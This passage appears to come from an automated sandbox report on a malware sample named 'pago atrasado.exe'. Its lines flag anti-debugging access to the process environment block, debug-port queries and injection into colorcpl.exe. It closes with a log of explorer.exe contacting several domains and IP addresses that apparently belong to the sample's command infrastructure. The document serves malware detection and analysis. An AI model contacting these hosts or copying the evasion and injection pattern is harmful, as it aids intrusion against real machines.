          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04550050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04550050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04601074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0455746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0460740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0460740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0460740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04604015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04604015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04608CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0454849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04539080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04557D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0455B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0455B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04573D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0453B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0453B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0455C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0455C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0453C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04539100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04539100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04539100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04608D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0453AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04554120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_045C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0454D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0454D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04562990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0456A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_0455C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04553A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04568E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04548A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04574A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04574A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04578EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04563B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04563B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04534F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04534F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04548794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_10009B50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exe | Domain query: www.ttemola.com
          Source: C:\Windows\explorer.exe | Network Connect: 208.91.197.27 80
          Source: C:\Windows\explorer.exe | Network Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exe | Network Connect: 46.101.121.244 80
          Source: C:\Windows\explorer.exe | Network Connect: 74.208.236.134 80
          Source: C:\Windows\explorer.exe | Domain query: www.baybeg.com
          Source: C:\Windows\explorer.exe | Domain query: www.everythangbutwhite.com
          Source: C:\Windows\explorer.exe | Domain query: www.highvizpeople.com
          Source: C:\Windows\explorer.exe | Domain query: www.itskosi.com
